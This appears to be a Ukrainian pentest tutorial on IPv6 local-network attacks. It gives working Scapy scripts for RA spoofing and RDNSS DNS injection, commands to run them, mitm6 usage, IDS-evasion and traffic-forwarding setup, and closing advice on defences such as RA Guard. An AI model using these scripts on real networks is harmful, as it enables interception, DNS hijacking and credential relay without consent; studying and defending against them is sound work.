16.12.2025
3 хв
462
Друга частина матеріалу присвячена практичному аналізу атак на IPv6 у реальних мережах. У ній розглядається, як стандартні механізми IPv6 поводяться в робочому середовищі та які ризики виникають під час їх неправильної або неконтрольованої роботи.
Матеріал охоплює підготовку системи, особливості обробки IPv6-трафіку, а також типові сценарії перехоплення та підміни мережевих параметрів. Окрему увагу приділено проблемам маршрутизації, стабільності з’єднань і наслідкам для корпоративної інфраструктури.
Щоб машина могла ефективно виконувати RA-спуфінг, RDNSS-ін’єкцію або DHCPv6-спуфінг, необхідно заздалегідь вимкнути або змінити поведінку системних IPv6-опцій, які можуть перешкоджати роботі або спричиняти конфлікти. Це особливо важливо, якщо атака здійснюється не з Kali, а з базової системи Debian/Ubuntu.
:~$ sudo ip link set dev eth0 promisc :~$ sudo sysctl -w net.ipv6.conf.all.accept_ra=0 :~$ sudo sysctl -w net.ipv6.conf.default.accept_ra=0 :~$ sudo sysctl -w net.ipv6.conf.all.accept_redirects=0 :~$ sudo modprobe nf_conntrack
Під час атак ваш комп’ютер може почати надсилати пакети перенаправлення ICMP, які будуть виявлені системою виявлення вторгнень. Щоб запобігти цьому:
:~$ sudo sysctl -w net.ipv6.conf.all.accept_redirects=0 :~$ sudo ip6tables -A INPUT -p ipv6-icmp --icmpv6-type redirect -j DROP :~$ sudo ip6tables -A OUTPUT -p ipv6-icmp --icmpv6-type redirect -j DROP
:~$ sudo sysctl -w fs.file-max=100000 :~$ sudo sysctl -w net.core.somaxconn=65535 :~$ sudo sysctl -w net.core.netdev_max_backlog=65536 :~$ sudo sysctl -w net.ipv4.tcp_fin_timeout=15 :~$ sudo sysctl -w net.ipv4.tcp_tw_reuse=1 :~$ sudo sysctl -w net.ipv4.tcp_max_tw_buckets=65536
Що це робить:
netdev_max_backlog: збільшує чергу на отримання пакетів;
somaxconn: збільшує довжину черги TCP-з’єднання;
tcp_tw_*: допомагає системі швидше звільняти сокети TIME-WAIT;
file-max: запобігає досягненню системою ліміту відкритих файлів за великої кількості підключень.
Якщо MITM пов’язаний з проксі-сервером TCP (наприклад, якщо ви перехоплюєте HTTPS або SMB), збільшене вікно TCP може пришвидшити передачу:
:~$ sudo sysctl -w net.ipv4.tcp_window_scaling=1
Атака RA Spoofing полягає в тому, що зловмисник надсилає фальшиві пакети Router Advertisement до локального сегмента, видаючи себе за маршрутизатор. Це дозволяє йому ввести фальшивий префікс IPv6 та нав’язати себе як шлюз за замовчуванням для всіх хостів. Навіть якщо мережа, здається, використовує лише IPv4, майже всі сучасні операційні системи.
Найважливішим параметром, який слід враховувати під час роботи з RA Spoofing, є routerlifetime. Цей параметр вказує хосту, скільки секунд вважати відправника RA дійсним маршрутизатором. Якщо вказати routerlifetime=0, хост видалить маршрут через цей вузол. Якщо вказати, , routerlifetime=1800він прийматиме зловмисника як шлюз за замовчуванням протягом наступних 30 хвилин.
Чим вищий час життя, тим довше зловмисник залишається в таблиці маршрутизації жертви. Чи потрібно це пентестеру? Навряд чи. Ризик DoS з MITM уже високий, тому зловмиснику потрібно бути обережним.
Пакети ICMPv6 RA містять два контрольні прапорці:
M (Конфігурація керованої адреси): Якщо встановлено, хост повинен використовувати DHCPv6 для отримання IPv6-адреси;
O (Інша конфігурація): Якщо встановлено, хост повинен використовувати DHCPv6 лише для отримання параметрів, не пов’язаних з адресою (наприклад, DNS).
Комбінація прапорців визначає поведінку клієнта:
Це критично важливо для оцінки поверхні атаки:
Коли
M=0, O=0→ пакети DHCPv6 не потрібні, і атака можлива лише через RA або RDNSS;
Коли
M=1, O=1→ мережа вразлива до підміни DHCPv6 (наприклад, через mitm6).
Аналіз значень прапорців у RA є ключовим для вибору вектора атаки.
Сценарій для проведення атаки виглядатиме наступним чином:
#!/usr/bin/env python3
from scapy.all import *
import argparse
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--interface", required=True, help="Network interface (e.g., eth0)")
parser.add_argument("-m", "--mac", required=True, help="Spoofed MAC address to include in the RA")
parser.add_argument("--llip", required=True, help="Your link-local IPv6 address")
parser.add_argument("-l", "--lifetime", type=int, default=1800, help="Router Lifetime in seconds (default: 1800)")
parser.add_argument("--interval", type=int, default=5, help="Interval between packets (default: 5 seconds)")
parser.add_argument("--revert", action="store_true", help="Send RA with router lifetime = 0 to remove route")
args = parser.parse_args()
lifetime = 0 if args.revert else args.lifetime
ra = IPv6(src=args.llip, dst="ff02::1", hlim=255) / \
ICMPv6ND_RA(routerlifetime=lifetime) / \
ICMPv6NDOptSrcLLAddr(lladdr=args.mac)
mode = "REVERT" if args.revert else "SPOOF"
print(f"[+] Sending {mode} RA on {args.interface}")
print(f" Source LL IP: {args.llip}")
print(f" MAC: {args.mac}")
print(f" Lifetime: {lifetime}s")
print(f" Interval: {args.interval}s")
send(ra, iface=args.interface, loop=1, inter=args.interval)
if __name__ == "__main__":
main()
Цей скрипт реалізує базову атаку підробки RA. Скрипт підробляє пакет оголошення маршрутизатора, який використовується для позначення жертвами в локальній мережі фальшивого шлюзу за замовчуванням.
--interface– це мережевий інтерфейс, через який буде надіслано RA-пакет;
--mac– MAC-адреса, зазначена в опції Адреса каналу джерела;
--llip– зловмисник вказує локальну для каналу IPv6-адресу, яка буде джерелом RA;
--lifetime– термін служби маршруту за замовчуванням (Router Lifetime);
--interval– зловмисник вказує інтервал між передачами RA (у секундах);
--revert– скасовує всі зміни;routerlifetime=0дозволяє зловмиснику видалити свою адресу як шлюз за замовчуванням на цільових хостах.
:~$ sudo python3 RA.py --interface eth0 --mac 00:50:00:00:01:00 --lifetime 300 --interval 5 --llip fe80:250:ff:fe00:100
Під час роботи з MITM-атаками, пов’язаними з ICMPv6, необхідно налаштувати значення часу життя, щоб уникнути DoS. MITM-атаки відомі своїми ризиками, але потрібно знати, що робити.
Тіло RA-пакета від зловмисника виглядатиме так:
Також варто звернути увагу на налаштування «Налаштування маршрутизатора за замовчуванням: Високий». Це вказує на пріоритет цього маршрутизатора серед усіх доступних маршрутизаторів. Це частина прапорців пакетів RA та визначає, наскільки клієнт довірятиме цьому конкретному шлюзу, якщо в мережі їх кілька.
Можливі значення:
00— Низький (низький пріоритет);
01— Середній (за замовчуванням);
10— Високий (високий пріоритет)
Для зловмисника встановлення прапорця Prf = High робить його комп’ютер пріоритетним шлюзом над легітимними пристроями в мережі, що дозволяє йому:
Більш надійно перехоплювати трафік (навіть якщо справжній маршрутизатор активний);
Надійніше підтримувати статус шлюзу за замовчуванням.
Коли клієнт має кілька RA від різних маршрутизаторів у локальній мережі, він порівнює їхні пріоритети.
Якщо він бачить RA з High, а поточний шлюз був Mediumабо Low, клієнт переключиться на новий шлюз, навіть якщо термін служби попереднього маршруту ще не закінчився.
Це механізм вибору «найкращого маршрутизатора».
Тим часом, на легітимному хості Windows ми бачимо, що локальна адреса зловмисника стала шлюзом за замовчуванням на рівні IPv6. Це було метою цієї атаки. І вона триватиме 300 секунд, як було вказано під час запуску інструменту.
C:\Users\user> ipconfig /all
Тепер трафік усіх локальних хостів проходитиме через комп’ютер зловмисника.
Цей --intervalпараметр контролює частоту надсилання RA-пакетів. Це важливо через своєрідний стан гонки між вашими фальшивими RA-пакетами та RA-пакетами від справжнього маршрутизатора в мережі.
Якщо справжній маршрутизатор надсилатиме свої RA-пакети частіше, ніж ви, клієнти можуть знову почати використовувати його як основний шлюз. Тому, щоб ваша атака була стабільною, інтервал необхідно встановити таким чином, щоб ваші RA-пакети надходили частіше, ніж пакети від легітимного пристрою.
Наприклад:
Якщо ви вкажете
--interval 10, а справжній маршрутизатор надсилатиме RA кожні 30 секунд, ваш спуфінг буде ефективним.
Але якщо ваш
--interval 30роутер надсилатиме RA кожні 10 секунд, жертви будуть «перехоплені» назад.
Зазвичай значення від 3 до 10 секунд підходить добре, але в деяких мережах може знадобитися поекспериментувати.
Одна з поширених помилок під час виконання підміни RA – це ігнорування питання маршрутизації на стороні зловмисника. Навіть якщо хост прийняв наш RA та вважає нас шлюзом за замовчуванням, це не означає, що весь трафік автоматично потраплятиме до нас. Звичайно, він буде першим. Але потім потрібно вміти правильно обробити його та відправити назад. В іншому випадку можуть виникнути великі проблеми.
За замовчуванням маршрутизація вимкнена в дистрибутивах Linux. Її потрібно явно ввімкнути за допомогою наступної команди, але rootдля цього вам потрібні привілеї:
:~$ sudo sysctl -w net.ipv6.conf.all.forwarding=1
Тепер нам потрібно налаштувати брандмауер. Якщо він блокує все за замовчуванням (що часто буває), нам потрібно ввімкнути переадресацію:
:~$ sudo ip6tables -A FORWARD -i eth0 -j ACCEPT
Під час впровадження RA Spoofing одним із ключових завдань є забезпечення правильної маршрутизації IPv6-трафіку. Навіть якщо жертва прийняла RA-пакет і встановила атакувальну машину як шлюз за замовчуванням, це не гарантує роботу з’єднання. Без правильних налаштувань переадресації та трансляції вихідного трафіку виникне наступна ситуація:
Вхідний трафік від жертви надходить до атакуючої системи;
Але під час спроби переслати цей трафік далі (наприклад, до Інтернету), відповіді від віддалених хостів не можуть повернутися до жертви або маршрутизуються асиметрично;
В результаті з’єднання розривається: клієнт надсилає SYN, отримує SYN/ACK (через інший шлях), не розпізнає його та скидає.
Це типовий приклад асиметричної маршрутизації, за якої зворотний трафік обходить атакуючу систему або надходить з неправильною IP-адресою джерела, що порушує TCP-сеанс або спричиняє проблеми на L7.
Ця команда активує маскарадінг, який замінює вихідну IPv6-адресу адресою атакуючого хоста. Це необхідно, коли:
:~$ sudo ip6tables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
Дозволяє маскарадінг — заміну вихідної IPv6-адреси адресою атакуючого хоста. Це необхідно, коли:
Зловмисник не знаходиться в тій самій підмережі, що й жертва;
Трафік перенаправляється в інший сегмент мережі або в Інтернет;
Оголошувати маршрути назад до адрес жертви неможливо або небажано.
Маскування вирішує проблему повернення трафіку: віддалений хост (наприклад, зовнішній сервер) бачитиме IP-адресу зловмисника як джерело та надсилатиме на нього пакети відповідей. Атакувальна машина потім самостійно надсилатиме ці відповіді жертві, завершуючи ланцюжок.
Без цього правила зворотні пакети або не повернуться, або будуть відправлені безпосередньо в обхід зловмисника (якщо в таблиці маршрутизації є альтернатива), що зробить атаку неефективною.
:~$ sudo ip6tables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
Після цього зловмисник, який стоїть посередині, може прослуховувати трафік. Ось приклад перехоплених ICMPv6 Echo-запитів та відповідей між клієнтом Windows та маршрутизатором Cisco IOS:
C:\Users\user>ping 4000::1
Це дозволяє здійснювати MITM-атаки в мережах IPv6 з використанням хибних RA. Майте на увазі, що якщо ви здійснюєте цю атаку в реальній інфраструктурі, вам знадобиться NAT64 (наприклад, tayga), оскільки:
Більшість хостів IPv4 досі використовують Інтернет;
Цільові хости, підключені через IPv6, намагатимуться отримати доступ до сайтів, які не мають записів AAAA (або нічого не знають про NAT64);
У цій ситуації ваша машина повинна перетворювати IPv6-трафік жертви на IPv4-запити до зовнішнього світу і назад.
Без цього хост, чий IPv6-шлюз ви перехопили, просто втратить доступ до половини ресурсів. Це призведе або до відкату до поточного маршрутизатора, або до підозр.
RDNSS (рекурсивний варіант DNS-сервера) – цей механізм є частиною протоколу IPv6 Router Advertisement (RA), описаного в RFC 8106. Він дозволяє маршрутизатору передавати адреси DNS-серверів безпосередньо клієнтам у пакетах RA, без необхідності використання DHCPv6.
Цей механізм використовується в операційних системах, що підтримують конфігурацію DNS без урахування стану, і дозволяє клієнту автоматично налаштовувати DNS під час отримання RA.
Суть підміни RDNSS полягає в наступному:
Зловмисник надсилає RA-пакети, що містять фальшивий DNS-сервер;
Клієнти, що підтримують RDNSS, приймають цю адресу та починають надсилати DNS-запити через зловмисника;
Це дозволяє перехоплювати, замінювати або перенаправляти DNS-запити, отримуючи повний контроль над дозволом доменів у мережі.
Підтримка RDNSS залежить від реалізації клієнтського стеку:
Windows 10 1709+, Windows 11, Linux із systemd-дозволом, macOS Big Sur+ приймають RDNSS за замовчуванням;
Старіші версії Windows (7, 8, рання 10) ігнорують RDNSS та використовують DHCPv6 або ручне налаштування DNS.
Спуфінг RDNSS особливо ефективний у мережах, де: DHCPv6 не використовується або вимкнено, RA-пакети приймаються без перевірки, а DNS-запити не шифруються (без DoH/DoT).
Все, що потрібно зробити зловмиснику, це запустити підробку RA з увімкненою опцією RDNSS, і більшість сучасних пристроїв автоматично використовуватимуть підроблений DNS.
Атака RDNSS Spoofing буде виконана за допомогою цього невеликого інструменту, але необхідно пояснити деталі скрипта, щоб ви зрозуміли, як працює ця атака.
#!/usr/bin/env python3
from scapy.all import *
import argparse
def send_rdns_spoof(args):
ra = IPv6(
src=args.llip,
dst="ff02::1",
hlim=255) / ICMPv6ND_RA(routerlifetime=0) / ICMPv6NDOptRDNSS(dns=[args.dns], lifetime=args.lifetime)
print(f"[+] Sending RDNSS RA on {args.interface}")
print(f" Source LL IP: {args.llip}")
print(f" DNS: {args.dns}")
print(f" Lifetime: {args.lifetime}s")
print(f" Interval: {args.interval}s")
send(ra, iface=args.interface, loop=1, inter=args.interval)
def main():
parser = argparse.ArgumentParser(description="RDNSS Spoofing via IPv6 RA")
parser.add_argument("-i", "--interface", required=True, help="Network interface (e.g. eth0)")
parser.add_argument("--llip", required=True, help="Link-local IPv6 address (source IP)")
parser.add_argument("--dns", required=True, help="DNS server to inject (IPv6 address)")
parser.add_argument("--lifetime", type=int, default=600, help="RDNSS option lifetime (default: 600 seconds)")
parser.add_argument("--interval", type=int, default=5, help="Interval between packets in seconds")
args = parser.parse_args()
send_rdns_spoof(args)
if __name__ == "__main__":
main()
Якщо ви встановите занадто високе значення (наприклад, 1800або 3600секунди) і не надсилатимете RA знову, а просто завершите скрипт або вийдете з мережі:
Клієнт продовжуватиме використовувати підроблений DNS до кінця його терміну служби;
Якщо DNS більше недоступний (наприклад, зловмисник вимкнув машину), це призведе до збою розпізнавання імен;
Фактично, це стає ненавмисною DoS-атакою.
Якщо вам потрібне тимчасове перехоплення на 60 або 120 секунд, вкажіть --lifetime 60або . --lifetime 120
Якщо підробка має тривати довго – підтримуйте її, повторно надіславши RA;
Якщо вам потрібно видалити запис з клієнта, надішліть той самий RA з --lifetime 0, і він видалить DNS з кешу.
:~$ sudo python3 rdnss.py -i eth0 --llip fe80::20c:29ff:fef0:470d --dns fe80::20c:29ff:fef0:470d --lifetime 100 --interval 30
[+] Sending RDNSS RA on eth0
Source LL IP: fe80::20c:29ff:fef0:470d
DNS: fe80::20c:29ff:fef0:470d
Lifetime: 100s
Interval: 30s
На скріншоті видно, що ми відправили певний ICMPv6 RA-пакет з опцією RDNSS, щоб зловмисник міг нав’язати свій комп’ютер як адресу DNS-сервера IPv6. Це підтверджують заголовки, виділені на скріншоті. Їхній час життя дорівнює значенням, які ми вказали під час запуску інструменту атаки.
RDNSS не перезаписує поточний DNS, але додається до списку DNS-серверів у systemd-resolved або Windows — може виникнути конкуренція між DHCP та RDNSS.
Також варто зазначити, що в заголовку RA використовується значення routerlifetime=0, щоб не призначати вузол шлюзом за замовчуванням. Це не входить до цілей атаки на RDNSS.
Тепер ми можемо перевірити, чи підміна RDNSS мала місце на комп’ютері з Windows, і чи LL IPv6-адреса зловмисника відображалася на хості як адреса DNS-сервера IPv6:
Перед нападом:
C:\Windows\system32>netsh interface ipv6 show dnsservers
Configuration for interface "Ethernet0"
DNS servers configured through DHCP: None
Register with which suffix: Primary only
Configuration for interface "Loopback Pseudo-Interface 1"
Statically Configured DNS Servers: fec0:0:0:ffff::1%1
fec0:0:0:ffff::2%1
fec0:0:0:ffff::3%1
Register with which suffix: Primary only
Після підміни RDNSS:
C:\Windows\system32>netsh interface ipv6 show dnsservers
Configuration for interface "Ethernet0"
DNS servers configured through DHCP: fe80::20c:29ff:fef0:470d%11
Register with which suffix: Primary only
Configuration for interface "Loopback Pseudo-Interface 1"
Statically Configured DNS Servers: fec0:0:0:ffff::1%1
fec0:0:0:ffff::2%1
fec0:0:0:ffff::3%1
Register with which suffix: Primary only
fe80::20c:29ff:fef0:470d— це локальна адреса зловмисника.
Однак атаки MITM і навіть атаки DNS/RDNSS є руйнівними, якщо немає детального розуміння того, як працює атака. Зловмисник повинен розрахувати часовий інтервал, протягом якого він підробить адресу. Якщо зловмисник хоче видалити свою адресу як DNS-сервера на цільовому хості, він повинен повторно виконати скрипт, вказавши--lifetime 0
:~$ sudo python3 rdnss.py -i eth0 --llip fe80::20c:29ff:fef0:470d --dns fe80::20c:29ff:fef0:470d --lifetime 0 --interval 5
[+] Sending RDNSS RA on eth0
Source LL IP: fe80::20c:29ff:fef0:470d
DNS: fe80::20c:29ff:fef0:470d
Lifetime: 0s
Interval: 5s
Ось як виглядатиме RA-пакет, де час життя RDNSS буде нульовим. Це дуже просто:
Таким чином, ви можете впливати на DNS, використовуючи можливості протоколу ICMPv6, додавши опцію RDNSS. Насправді це дуже простий та ефективний інструмент. Однак його потрібно використовувати з розумом, щоб уникнути збоїв мережі та переривання бізнес-процесів. Спуфінг-атаки мають погану репутацію у продакшені, однак за наявності глибокого розуміння мереж їхніх негативних наслідків можна уникнути.
І в певному сенсі це перевершує mitm6 , який в основному покладається на надсилання повідомлень DHCPv6. Тут ми можемо вміло керувати RA-пакетами, замінювати необхідні заголовки та коригувати певні значення. Оволодіння цим допоможе вам краще зрозуміти мережі та атаки на них.
Одна з найпопулярніших утиліт в арсеналі пентестерів для атак на мережі Windows.
mitm6 — це інжектор пакетів DHCPv6, який дозволяє зловмиснику видавати себе за легітимний сервер DHCPv6 та представляти клієнтам DHCPv6 хибні конфігурації, зокрема підробляючи адресу DNS-сервера на рівні IPv6.
Протокол DHCPv6 має такі типи повідомлень:
DHCPv6 Solicit: Це повідомлення надсилається клієнтом для ініціювання зв’язку із серверами DHCPv6. Клієнт розсилає це повідомлення за допомогою широкомовної або багатоадресної розсилки, щоб визначити доступні сервери DHCP у мережі. Сервери DHCPv6, отримавши запит, можуть відповісти повідомленням DHCP Advertise із пропонуванням своєї конфігурації.
DHCPv6 Advertise: Це повідомлення є відповіддю сервера DHCPv6 на повідомлення DHCPv6 Solicit, отримане від клієнта. Сервер використовує це повідомлення, щоб повідомити клієнту, що він доступний для надсилання конфігурації (за замовчуванням GW, DNS-сервер тощо).
Запит DHCPv6: Після отримання реклами DHCPv6 клієнт вибирає сервер DHCPv6 та надсилає повідомлення DHCP v6-Request на цей сервер, щоб офіційно запросити запропоновані налаштування. Це повідомлення також можна використовувати для підтвердження або оновлення раніше отриманих налаштувань конфігурації під час повторного підключення пристрою до мережі.
Відповідь DHCPv6: Повідомлення відповіді DHCPv6 використовується сервером для підтвердження надання або оновлення IP-адреси та інших параметрів конфігурації для пристрою. Його також може надсилати сервер у відповідь на повідомлення DHCP Release від клієнта, коли клієнт звільняє орендовану IP-адресу.
Зазвичай Windows надсилає запит DHCPv6 у невизначеному порядку в надії отримати конфігурацію від сервера. Цей запит виглядає так:
~$ sudo mitm6 -i eth0 --no-ra
У цьому випадку, щоб атакувати саме DHCPv6, йому потрібно буде надіслати рекламне повідомлення. Іншими словами, зловмисник може використати це, щоб нав’язати адресу свого комп’ютера як адресу DNS-сервера на рівні IPv6. Саме це власне і робить інструмент mitm6.
Чому 300 секунд? Це значення жорстко закодовано в коді інструменту mitm6. Будьте уважні!
Після цієї атаки IPv6-адреса LL зловмисника відображатиметься в системі цільового хоста як DNS-сервер IPv6:
Це відкриває можливості для зловмисників виконувати NTLM-ретрансляцію, перехоплювати DNS-запити, атакувати WPAD та багато іншого. Це досить проста атака, але вона вимагає особливої обережності та детального розуміння процесу, щоб уникнути DoS.
Однак, варто зазначити, що на відміну від RDNSS Spoofing, mitm6 не пропонує такої ж гнучкості. Зловмисники, які використовують ручні рішення, самі вирішують, скільки секунд виконувати спуфінг і коли зупинитися.
Атаки на IPv6 переважно є атаками типу спуфінгу. Багато користувачів вимикають IPv6 у своїй інфраструктурі, оскільки вважають його непотрібним.
Щоб запобігти атакам IPv6, таким як спуфінг RA та спуфінг DHCPv6, на рівні L2 застосовуються такі механізми:
RA Guard — це фільтрація RA-пакетів на рівні комутатора.
DHCPv6 Guard блокує DHCPv6-сервери на неавторизованих портах.
Перевірка ACL/ND портів, що фільтрує NDP, RA та інші ICMPv6-повідомлення на основі шаблонів.
Однак, насправді:
Ці механізми часто вимкнені за замовчуванням;
Вони неправильно налаштовані в змішаних мережах IPv4/IPv6;
Вони не працюють на застарілих або дешевих комутаторах (особливо в сегментах Wi-Fi).
В результаті, навіть з увімкненим IPv6, захист або відсутній, або неефективний, що робить атаки зі спуфінгом цілком можливими в реальних інфраструктурах.
Розглянуті механізми показують, що атаки на IPv6 залишаються цілком реалістичними в сучасних мережах, особливо за відсутності належного контролю на рівні L2 та коректних політик фільтрації. Автоматизація та довірча модель IPv6 спрощують роботу мережі, але водночас створюють умови для зловживань у локальному сегменті.
Вимкнення IPv6 не є універсальним рішенням і часто призводить лише до прихованих проблем, а не до реального підвищення безпеки. Набагато ефективнішим підходом є розуміння принципів роботи протоколу, усвідомлення потенційних векторів атак і застосування відповідних контрзаходів. Регулярний аналіз мережевого трафіку та глибоке знання протоколів залишаються ключовими елементами побудови безпечної інфраструктури.
